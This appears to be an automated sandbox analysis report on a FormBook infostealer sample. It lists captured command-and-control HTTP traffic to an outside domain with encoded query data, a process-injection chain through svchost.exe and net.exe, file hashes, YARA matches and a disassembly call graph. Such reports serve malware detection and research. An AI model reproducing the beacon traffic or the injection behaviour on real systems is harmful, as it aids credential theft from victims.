                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?QftlZ=CnaPg8j&A60d=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLyg6sZMK+n6SnxPYLsSNnFHqgmG+z3/fMKl0erdP4+1Q9hQ=="}</script></head></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        53192.168.2.8497613.33.130.190805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:03:13.332119942 CET387OUTGET /yjfe/?A60d=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYp294ngYYiGslw49G10KSSL4+0zLG2YUwGZkJDIt8ktcvA==&QftlZ=CnaPg8j HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.corpseflowerwatch.org
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:03:13.974917889 CET406INHTTP/1.1 200 OK
                                                                                        Server: openresty
                                                                                        Date: Wed, 06 Nov 2024 15:03:13 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 266
                                                                                        Connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 36 30 64 3d 73 73 4c 6c 2f 37 30 47 41 68 55 63 4b 64 44 67 64 56 66 58 6f 70 37 66 78 52 4d 67 70 59 69 5a 33 76 73 4a 63 63 4f 55 48 79 43 71 7a 63 70 66 72 49 72 72 64 30 34 61 32 4f 41 4e 36 57 66 48 68 77 79 42 30 52 51 2b 44 6c 6a 6e 48 75 36 52 67 75 70 52 59 70 32 39 34 6e 67 59 59 69 47 73 6c 77 34 39 47 31 30 4b 53 53 4c 34 2b 30 7a 4c 47 32 59 55 77 47 5a 6b 4a 44 49 74 38 6b 74 63 76 41 3d 3d 26 51 66 74 6c 5a 3d 43 6e 61 50 67 38 6a 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?A60d=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRYp294ngYYiGslw49G10KSSL4+0zLG2YUwGZkJDIt8ktcvA==&QftlZ=CnaPg8j"}</script></head></html>


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:09:59:06
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Users\user\Desktop\XhAQ0Rk63O.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\XhAQ0Rk63O.exe"
                                                                                        Imagebase:0x400000
                                                                                        File size:1'330'101 bytes
                                                                                        MD5 hash:1641128999C6968823CA0D92CB8F0ECE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:2
                                                                                        Start time:09:59:08
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\SysWOW64\svchost.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\XhAQ0Rk63O.exe"
                                                                                        Imagebase:0xbe0000
                                                                                        File size:46'504 bytes
                                                                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1574269815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1574620078.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1575222037.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:09:59:13
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe"
                                                                                        Imagebase:0x180000
                                                                                        File size:140'800 bytes
                                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3871219369.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:09:59:19
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Windows\SysWOW64\net.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\net.exe"
                                                                                        Imagebase:0x740000
                                                                                        File size:47'104 bytes
                                                                                        MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3866219592.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3863689053.0000000002960000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3866264697.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:09:59:43
                                                                                        Start date:06/11/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                        Imagebase:0x7ff6d20e0000
                                                                                        File size:676'768 bytes
                                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:3.3%
                                                                                          Dynamic/Decrypted Code Coverage:1.1%
                                                                                          Signature Coverage:4.1%
                                                                                          Total number of Nodes:1676
                                                                                          Total number of Limit Nodes:52
                                                                                          execution_graph 84451 467046 84452 46705d 84451->84452 84462 467136 84451->84462 84453 4671a0 84452->84453 84454 46710d 84452->84454 84455 467199 84452->84455 84464 46706e 84452->84464 84457 41171a 75 API calls 84453->84457 84458 41171a 75 API calls 84454->84458 84485 40e380 VariantClear ctype 84455->84485 84470 4670f3 _realloc 84457->84470 84458->84470 84459 4670d2 84461 41171a 75 API calls 84459->84461 84460 41171a 75 API calls 84460->84462 84463 4670d8 84461->84463 84483 443466 75 API calls 84463->84483 84469 4670a9 ctype 84464->84469 84471 41171a 84464->84471 84467 4670e8 84484 45efe7 77 API calls ctype 84467->84484 84469->84453 84469->84459 84469->84470 84470->84460 84473 411724 84471->84473 84474 41173e 84473->84474 84478 411740 std::bad_alloc::bad_alloc 84473->84478 84486 4138ba 84473->84486 84504 411afc 6 API calls __decode_pointer 84473->84504 84474->84469 84476 411766 84508 4116fd 67 API calls std::exception::exception 84476->84508 84478->84476 84505 411421 84478->84505 84479 411770 84509 41805b RaiseException 84479->84509 84482 41177e 84483->84467 84484->84470 84485->84453 84487 41396d 84486->84487 84497 4138cc 84486->84497 84517 411afc 6 API calls __decode_pointer 84487->84517 84489 413973 84518 417f23 67 API calls __getptd_noexit 84489->84518 84494 413929 RtlAllocateHeap 84494->84497 84495 4138dd 84495->84497 84510 418252 67 API calls 2 library calls 84495->84510 84511 4180a7 67 API calls 7 library calls 84495->84511 84512 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84495->84512 84497->84494 84497->84495 84498 413959 84497->84498 84501 41395e 84497->84501 84503 413965 84497->84503 84513 41386b 67 API calls 4 library calls 84497->84513 84514 411afc 6 API calls __decode_pointer 84497->84514 84515 417f23 67 API calls __getptd_noexit 84498->84515 84516 417f23 67 API calls __getptd_noexit 84501->84516 84503->84473 84504->84473 84519 4113e5 84505->84519 84507 41142e 84507->84476 84508->84479 84509->84482 84510->84495 84511->84495 84513->84497 84514->84497 84515->84501 84516->84503 84517->84489 84518->84503 84520 4113f1 __calloc_impl 84519->84520 84527 41181b 84520->84527 84526 411412 __calloc_impl 84526->84507 84553 418407 84527->84553 84529 4113f6 84530 4112fa 84529->84530 84618 4169e9 TlsGetValue 84530->84618 84533 4169e9 __decode_pointer 6 API calls 84534 41131e 84533->84534 84535 4113a1 84534->84535 84628 4170e7 68 API calls 4 library calls 84534->84628 84550 41141b 84535->84550 84537 41133c 84538 411388 84537->84538 84541 411357 84537->84541 84542 411366 84537->84542 84539 41696e __encode_pointer 6 API calls 84538->84539 84540 411396 84539->84540 84543 41696e __encode_pointer 6 API calls 84540->84543 84629 417047 73 API calls _realloc 84541->84629 84542->84535 84545 411360 84542->84545 84543->84535 84545->84542 84547 41137c 84545->84547 84630 417047 73 API calls _realloc 84545->84630 84631 41696e TlsGetValue 84547->84631 84548 411376 84548->84535 84548->84547 84643 411824 84550->84643 84554 41841c 84553->84554 84555 41842f EnterCriticalSection 84553->84555 84560 418344 84554->84560 84555->84529 84557 418422 84557->84555 84588 4117af 67 API calls 3 library calls 84557->84588 84559 41842e 84559->84555 84561 418350 __calloc_impl 84560->84561 84562 418360 84561->84562 84563 418378 84561->84563 84589 418252 67 API calls 2 library calls 84562->84589 84569 418386 __calloc_impl 84563->84569 84592 416fb6 84563->84592 84565 418365 84590 4180a7 67 API calls 7 library calls 84565->84590 84569->84557 84570 41836c 84591 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84570->84591 84571 4183a7 84573 418407 __lock 67 API calls 84571->84573 84572 418398 84598 417f23 67 API calls __getptd_noexit 84572->84598 84576 4183ae 84573->84576 84578 4183e2 84576->84578 84579 4183b6 84576->84579 84581 413a88 __wsetenvp 67 API calls 84578->84581 84599 4189e6 InitializeCriticalSectionAndSpinCount __calloc_impl 84579->84599 84583 4183d3 84581->84583 84582 4183c1 84582->84583 84600 413a88 84582->84600 84614 4183fe LeaveCriticalSection _doexit 84583->84614 84586 4183cd 84613 417f23 67 API calls __getptd_noexit 84586->84613 84588->84559 84589->84565 84590->84570 84595 416fbf 84592->84595 84593 4138ba _malloc 66 API calls 84593->84595 84594 416ff5 84594->84571 84594->84572 84595->84593 84595->84594 84596 416fd6 Sleep 84595->84596 84597 416feb 84596->84597 84597->84594 84597->84595 84598->84569 84599->84582 84601 413a94 __calloc_impl 84600->84601 84602 418407 __lock 65 API calls 84601->84602 84607 413b0d _realloc __calloc_impl 84601->84607 84612 413ad3 84601->84612 84609 413aab ___sbh_find_block 84602->84609 84603 413ae8 RtlFreeHeap 84604 413afa 84603->84604 84603->84607 84617 417f23 67 API calls __getptd_noexit 84604->84617 84606 413aff GetLastError 84606->84607 84607->84586 84608 413ac5 84616 413ade LeaveCriticalSection _doexit 84608->84616 84609->84608 84615 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree __cftoe2_l 84609->84615 84612->84603 84612->84607 84613->84583 84614->84569 84615->84608 84616->84612 84617->84606 84619 416a01 84618->84619 84620 416a22 GetModuleHandleW 84618->84620 84619->84620 84621 416a0b TlsGetValue 84619->84621 84622 416a32 84620->84622 84623 416a3d GetProcAddress 84620->84623 84625 416a16 84621->84625 84641 41177f Sleep GetModuleHandleW 84622->84641 84627 41130e 84623->84627 84625->84620 84625->84627 84626 416a38 84626->84623 84626->84627 84627->84533 84628->84537 84629->84545 84630->84548 84632 4169a7 GetModuleHandleW 84631->84632 84633 416986 84631->84633 84635 4169c2 GetProcAddress 84632->84635 84636 4169b7 84632->84636 84633->84632 84634 416990 TlsGetValue 84633->84634 84638 41699b 84634->84638 84640 41699f 84635->84640 84642 41177f Sleep GetModuleHandleW 84636->84642 84638->84632 84638->84640 84639 4169bd 84639->84635 84639->84640 84640->84538 84641->84626 84642->84639 84646 41832d LeaveCriticalSection 84643->84646 84645 411420 84645->84526 84646->84645 84647 4444e4 84652 40d900 84647->84652 84649 4444ee 84656 43723d 84649->84656 84651 444504 84653 40d917 84652->84653 84654 40d909 84652->84654 84653->84654 84655 40d91c CloseHandle 84653->84655 84654->84649 84655->84649 84657 40d900 CloseHandle 84656->84657 84658 437247 ctype 84657->84658 84658->84651 84659 444343 84662 444326 84659->84662 84661 44434e WriteFile 84663 444340 84662->84663 84664 4442c7 84662->84664 84663->84661 84669 40e190 SetFilePointerEx 84664->84669 84666 4442e0 SetFilePointerEx 84670 40e190 SetFilePointerEx 84666->84670 84668 4442ff 84668->84661 84669->84666 84670->84668 84671 46d22f 84674 46d098 84671->84674 84673 46d241 84675 46d0b5 84674->84675 84676 46d115 84675->84676 84677 46d0b9 84675->84677 84729 45c216 78 API calls 84676->84729 84678 41171a 75 API calls 84677->84678 84680 46d0c0 84678->84680 84682 46d0cc 84680->84682 84718 40d940 76 API calls 84680->84718 84681 46d126 84683 46d0f8 84681->84683 84689 46d142 84681->84689 84719 453063 84682->84719 84725 4092c0 84683->84725 84686 46d0fd 84686->84673 84690 46d1c8 84689->84690 84692 46d158 84689->84692 84739 4676a3 78 API calls 84690->84739 84695 453063 111 API calls 84692->84695 84693 46d0ea 84693->84689 84696 46d0ee 84693->84696 84708 46d15e 84695->84708 84696->84683 84724 44ade5 CloseHandle ctype 84696->84724 84697 46d1ce 84740 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 84697->84740 84698 46d18d 84730 467fce 82 API calls 84698->84730 84700 46d196 84731 4013a0 84700->84731 84704 46d1e7 84707 4092c0 VariantClear 84704->84707 84716 46d194 84704->84716 84707->84716 84708->84698 84708->84700 84709 46d1ac 84737 40d3b0 75 API calls 2 library calls 84709->84737 84711 46d224 84711->84673 84712 46d1b8 84738 467fce 82 API calls 84712->84738 84713 40d900 CloseHandle 84715 46d216 84713->84715 84741 44ade5 CloseHandle ctype 84715->84741 84716->84711 84716->84713 84718->84682 84720 45306e 84719->84720 84721 45307a 84719->84721 84720->84721 84742 452e2a 111 API calls 5 library calls 84720->84742 84723 40dfa0 83 API calls 84721->84723 84723->84693 84724->84683 84726 4092c8 ctype 84725->84726 84727 429db0 VariantClear 84726->84727 84728 4092d5 ctype 84726->84728 84727->84728 84728->84686 84729->84681 84730->84716 84732 41171a 75 API calls 84731->84732 84733 4013c4 84732->84733 84743 401380 84733->84743 84736 40df50 75 API calls 84736->84709 84737->84712 84738->84716 84739->84697 84740->84704 84741->84711 84742->84721 84744 41171a 75 API calls 84743->84744 84745 401387 84744->84745 84745->84736 84746 40e5e60 84760 40e3ab0 84746->84760 84748 40e5f0f 84763 40e5d50 84748->84763 84750 40e5f38 CreateFileW 84752 40e5f8c 84750->84752 84754 40e5f87 84750->84754 84753 40e5fa3 VirtualAlloc 84752->84753 84752->84754 84753->84754 84755 40e5fc1 ReadFile 84753->84755 84755->84754 84756 40e5fdc 84755->84756 84757 40e4d50 13 API calls 84756->84757 84758 40e600f 84757->84758 84759 40e6032 ExitProcess 84758->84759 84759->84754 84766 40e6f40 GetPEB 84760->84766 84762 40e413b 84762->84748 84764 40e5d59 Sleep 84763->84764 84765 40e5d67 84764->84765 84767 40e6f6a 84766->84767 84767->84762 84768 40116e 84769 401119 DefWindowProcW 84768->84769 84770 429212 84775 410b90 84770->84775 84773 411421 __cinit 74 API calls 84774 42922f 84773->84774 84776 410b9a __write_nolock 84775->84776 84777 41171a 75 API calls 84776->84777 84778 410c31 GetModuleFileNameW 84777->84778 84792 413db0 84778->84792 84780 410c66 _wcsncat 84795 413e3c 84780->84795 84783 41171a 75 API calls 84784 410ca3 _wcscpy 84783->84784 84785 410cd1 RegOpenKeyExW 84784->84785 84786 429bc3 RegQueryValueExW 84785->84786 84787 410cf7 84785->84787 84788 429cd9 RegCloseKey 84786->84788 84790 429bf2 _wcscat _wcslen _wcsncpy 84786->84790 84787->84773 84789 41171a 75 API calls 84789->84790 84790->84789 84791 429cd8 84790->84791 84791->84788 84798 413b95 84792->84798 84828 41abec 84795->84828 84799 413c2f 84798->84799 84806 413bae 84798->84806 84800 413d60 84799->84800 84801 413d7b 84799->84801 84824 417f23 67 API calls __getptd_noexit 84800->84824 84826 417f23 67 API calls __getptd_noexit 84801->84826 84804 413d65 84809 413cfb 84804->84809 84825 417ebb 6 API calls 2 library calls 84804->84825 84806->84799 84816 413c1d 84806->84816 84820 41ab19 67 API calls __calloc_impl 84806->84820 84808 413d03 84808->84799 84808->84809 84811 413d8e 84808->84811 84809->84780 84810 413cb9 84810->84799 84812 413cd6 84810->84812 84822 41ab19 67 API calls __calloc_impl 84810->84822 84827 41ab19 67 API calls __calloc_impl 84811->84827 84812->84799 84812->84809 84814 413cef 84812->84814 84823 41ab19 67 API calls __calloc_impl 84814->84823 84816->84799 84819 413c9b 84816->84819 84821 41ab19 67 API calls __calloc_impl 84816->84821 84819->84808 84819->84810 84820->84816 84821->84819 84822->84812 84823->84809 84824->84804 84826->84804 84827->84809 84829 41ac02 84828->84829 84830 41abfd 84828->84830 84837 417f23 67 API calls __getptd_noexit 84829->84837 84830->84829 84832 41ac22 84830->84832 84834 410c99 84832->84834 84839 417f23 67 API calls __getptd_noexit 84832->84839 84834->84783 84836 41ac07 84838 417ebb 6 API calls 2 library calls 84836->84838 84837->84836 84839->84836 84840 401230 84841 401241 _memset 84840->84841 84842 4012c5 84840->84842 84855 401be0 84841->84855 84844 40126b 84845 4012ae KillTimer SetTimer 84844->84845 84846 42aa61 84844->84846 84847 401298 84844->84847 84845->84842 84850 42aa8b Shell_NotifyIconW 84846->84850 84851 42aa69 Shell_NotifyIconW 84846->84851 84848 4012a2 84847->84848 84849 42aaac 84847->84849 84848->84845 84852 42aaf8 Shell_NotifyIconW 84848->84852 84853 42aad7 Shell_NotifyIconW 84849->84853 84854 42aab5 Shell_NotifyIconW 84849->84854 84850->84845 84851->84845 84852->84845 84853->84845 84854->84845 84856 401bfb 84855->84856 84876 401cde 84855->84876 84857 4013a0 75 API calls 84856->84857 84858 401c0b 84857->84858 84859 42a9a0 LoadStringW 84858->84859 84860 401c18 84858->84860 84863 42a9bb 84859->84863 84877 4021e0 84860->84877 84862 401c2d 84865 401c3a 84862->84865 84866 42a9cd 84862->84866 84890 40df50 75 API calls 84863->84890 84865->84863 84867 401c44 84865->84867 84891 40d3b0 75 API calls 2 library calls 84866->84891 84889 40d3b0 75 API calls 2 library calls 84867->84889 84870 42a9dc 84871 401c53 _memset _wcscpy _wcsncpy 84870->84871 84872 42a9f0 84870->84872 84875 401cc2 Shell_NotifyIconW 84871->84875 84892 40d3b0 75 API calls 2 library calls 84872->84892 84874 42a9fe 84875->84876 84876->84844 84878 42a598 84877->84878 84880 4021f1 _wcslen 84877->84880 84894 40c740 84878->84894 84882 402205 84880->84882 84883 402226 84880->84883 84881 42a5a2 84893 404020 75 API calls ctype 84882->84893 84884 401380 75 API calls 84883->84884 84887 40222d 84884->84887 84886 40220c _realloc 84886->84862 84887->84881 84888 41171a 75 API calls 84887->84888 84888->84886 84889->84871 84890->84871 84891->84870 84892->84874 84893->84886 84895 40c752 84894->84895 84896 40c747 84894->84896 84895->84881 84896->84895 84899 402ae0 84896->84899 84898 42a572 _realloc 84898->84881 84900 42a06a 84899->84900 84901 402aef 84899->84901 84902 401380 75 API calls 84900->84902 84901->84898 84903 42a072 84902->84903 84904 41171a 75 API calls 84903->84904 84905 42a095 _realloc 84904->84905 84905->84898 84906 40c170 84907 40c17b 84906->84907 84914 40c1a5 _realloc 84906->84914 84908 40c1d6 84907->84908 84909 40c19b 84907->84909 84907->84914 84911 41171a 75 API calls 84908->84911 84915 4034b0 84909->84915 84912 40c1df 84911->84912 84913 41171a 75 API calls 84912->84913 84912->84914 84913->84914 84916 4034b9 84915->84916 84917 4034bd 84915->84917 84916->84914 84918 41171a 75 API calls 84917->84918 84919 42a0ba 84917->84919 84920 4034fe _realloc ctype 84918->84920 84920->84914 84921 40f110 RegOpenKeyExW 84922 40f13c RegQueryValueExW RegCloseKey 84921->84922 84923 40f15f 84921->84923 84922->84923 84924 416193 84961 41718c 84924->84961 84926 41619f GetStartupInfoW 84928 4161c2 84926->84928 84962 41aa31 HeapCreate 84928->84962 84930 416212 84964 416e29 GetModuleHandleW 84930->84964 84934 416223 __RTC_Initialize 84998 41b669 84934->84998 84937 416231 84938 41623d GetCommandLineW 84937->84938 85066 4117af 67 API calls 3 library calls 84937->85066 85013 42235f GetEnvironmentStringsW 84938->85013 84941 41623c 84941->84938 84942 41624c 85019 4222b1 GetModuleFileNameW 84942->85019 84944 416256 84945 416261 84944->84945 85067 4117af 67 API calls 3 library calls 84944->85067 85023 422082 84945->85023 84951 416272 85036 41186e 84951->85036 84952 416279 84954 416284 __wwincmdln 84952->84954 85069 4117af 67 API calls 3 library calls 84952->85069 85042 40d7f0 84954->85042 84957 4162b3 85071 411a4b 67 API calls _doexit 84957->85071 84960 4162b8 __calloc_impl 84961->84926 84963 416206 84962->84963 84963->84930 85064 41616a 67 API calls 3 library calls 84963->85064 84965 416e44 84964->84965 84966 416e3d 84964->84966 84968 416fac 84965->84968 84969 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 84965->84969 85072 41177f Sleep GetModuleHandleW 84966->85072 85082 416ad5 70 API calls 2 library calls 84968->85082 84972 416e97 TlsAlloc 84969->84972 84971 416e43 84971->84965 84974 416218 84972->84974 84975 416ee5 TlsSetValue 84972->84975 84974->84934 85065 41616a 67 API calls 3 library calls 84974->85065 84975->84974 84976 416ef6 84975->84976 85073 411a69 6 API calls 3 library calls 84976->85073 84978 416efb 84979 41696e __encode_pointer 6 API calls 84978->84979 84980 416f06 84979->84980 84981 41696e __encode_pointer 6 API calls 84980->84981 84982 416f16 84981->84982 84983 41696e __encode_pointer 6 API calls 84982->84983 84984 416f26 84983->84984 84985 41696e __encode_pointer 6 API calls 84984->84985 84986 416f36 84985->84986 85074 41828b InitializeCriticalSectionAndSpinCount __mtinitlocknum 84986->85074 84988 416f43 84988->84968 84989 4169e9 __decode_pointer 6 API calls 84988->84989 84990 416f57 84989->84990 84990->84968 85075 416ffb 84990->85075 84993 4169e9 __decode_pointer 6 API calls 84994 416f8a 84993->84994 84994->84968 84995 416f91 84994->84995 85081 416b12 67 API calls 5 library calls 84995->85081 84997 416f99 GetCurrentThreadId 84997->84974 85101 41718c 84998->85101 85000 41b675 GetStartupInfoA 85001 416ffb __calloc_crt 67 API calls 85000->85001 85007 41b696 85001->85007 85002 41b8b4 __calloc_impl 85002->84937 85003 41b831 GetStdHandle 85012 41b7fb 85003->85012 85004 41b896 SetHandleCount 85004->85002 85005 416ffb __calloc_crt 67 API calls 85005->85007 85006 41b843 GetFileType 85006->85012 85007->85002 85007->85005 85008 41b77e 85007->85008 85007->85012 85008->85002 85009 41b7a7 GetFileType 85008->85009 85008->85012 85102 4189e6 InitializeCriticalSectionAndSpinCount __calloc_impl 85008->85102 85009->85008 85012->85002 85012->85003 85012->85004 85012->85006 85103 4189e6 InitializeCriticalSectionAndSpinCount __calloc_impl 85012->85103 85014 422370 85013->85014 85015 422374 85013->85015 85014->84942 85016 416fb6 __malloc_crt 67 API calls 85015->85016 85017 422395 _realloc 85016->85017 85018 42239c FreeEnvironmentStringsW 85017->85018 85018->84942 85020 4222e6 _wparse_cmdline 85019->85020 85021 416fb6 __malloc_crt 67 API calls 85020->85021 85022 422329 _wparse_cmdline 85020->85022 85021->85022 85022->84944 85024 42209a _wcslen 85023->85024 85028 416267 85023->85028 85025 416ffb __calloc_crt 67 API calls 85024->85025 85031 4220be _wcslen 85025->85031 85026 422123 85027 413a88 __wsetenvp 67 API calls 85026->85027 85027->85028 85028->84951 85068 4117af 67 API calls 3 library calls 85028->85068 85029 416ffb __calloc_crt 67 API calls 85029->85031 85030 422149 85032 413a88 __wsetenvp 67 API calls 85030->85032 85031->85026 85031->85028 85031->85029 85031->85030 85034 422108 85031->85034 85104 426349 67 API calls __calloc_impl 85031->85104 85032->85028 85034->85031 85105 417d93 10 API calls 3 library calls 85034->85105 85037 41187c __IsNonwritableInCurrentImage 85036->85037 85106 418486 85037->85106 85039 41189a __initterm_e 85040 411421 __cinit 74 API calls 85039->85040 85041 4118b9 __IsNonwritableInCurrentImage __initterm 85039->85041 85040->85041 85041->84952 85043 431bcb 85042->85043 85044 40d80c 85042->85044 85045 4092c0 VariantClear 85044->85045 85046 40d847 85045->85046 85110 40eb50 85046->85110 85051 40d877 85113 411ac6 67 API calls 4 library calls 85051->85113 85052 40d888 85114 411b24 67 API calls __calloc_impl 85052->85114 85054 40d891 85115 40f370 SystemParametersInfoW SystemParametersInfoW 85054->85115 85056 40d89f 85116 40d6d0 GetCurrentDirectoryW 85056->85116 85058 40d8a7 SystemParametersInfoW 85059 40d8cd 85058->85059 85060 4092c0 VariantClear 85059->85060 85061 40d8dd 85060->85061 85062 4092c0 VariantClear 85061->85062 85063 40d8e6 85062->85063 85063->84957 85070 411a1f 67 API calls _doexit 85063->85070 85064->84930 85065->84934 85066->84941 85067->84945 85068->84951 85069->84954 85070->84957 85071->84960 85072->84971 85073->84978 85074->84988 85077 417004 85075->85077 85078 416f70 85077->85078 85079 417022 Sleep 85077->85079 85083 422452 85077->85083 85078->84968 85078->84993 85080 417037 85079->85080 85080->85077 85080->85078 85081->84997 85082->84974 85084 42245e __calloc_impl 85083->85084 85085 422476 85084->85085 85090 422495 _memset 85084->85090 85096 417f23 67 API calls __getptd_noexit 85085->85096 85087 42247b 85097 417ebb 6 API calls 2 library calls 85087->85097 85089 422507 HeapAlloc 85089->85090 85090->85089 85092 418407 __lock 66 API calls 85090->85092 85093 42248b __calloc_impl 85090->85093 85098 41a74c 5 API calls 2 library calls 85090->85098 85099 42254e LeaveCriticalSection _doexit 85090->85099 85100 411afc 6 API calls __decode_pointer 85090->85100 85092->85090 85093->85077 85096->85087 85098->85090 85099->85090 85100->85090 85101->85000 85102->85008 85103->85012 85104->85031 85105->85034 85107 41848c 85106->85107 85108 41696e __encode_pointer 6 API calls 85107->85108 85109 4184a4 85107->85109 85108->85107 85109->85039 85154 40eb70 85110->85154 85113->85052 85114->85054 85115->85056 85158 401f80 85116->85158 85118 40d6f1 IsDebuggerPresent 85119 431a9d MessageBoxA 85118->85119 85120 40d6ff 85118->85120 85121 431ab6 85119->85121 85120->85121 85122 40d71f 85120->85122 85260 403e90 75 API calls 3 library calls 85121->85260 85228 40f3b0 85122->85228 85126 40d73a GetFullPathNameW 85258 401440 127 API calls _wcscat 85126->85258 85128 40d77a 85129 40d782 85128->85129 85131 431b09 SetCurrentDirectoryW 85128->85131 85130 40d78b 85129->85130 85261 43604b 6 API calls 85129->85261 85240 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 85130->85240 85131->85129 85134 431b28 85134->85130 85136 431b30 GetModuleFileNameW 85134->85136 85138 431ba4 GetForegroundWindow ShellExecuteW 85136->85138 85139 431b4c 85136->85139 85142 40d7c7 85138->85142 85262 401b70 85139->85262 85140 40d795 85148 40d7a8 85140->85148 85248 40e1e0 85140->85248 85145 40d7d1 SetCurrentDirectoryW 85142->85145 85145->85058 85147 431b66 85269 40d3b0 75 API calls 2 library calls 85147->85269 85148->85142 85259 401000 Shell_NotifyIconW _memset 85148->85259 85151 431b72 GetForegroundWindow ShellExecuteW 85152 431b9f 85151->85152 85152->85142 85153 40eba0 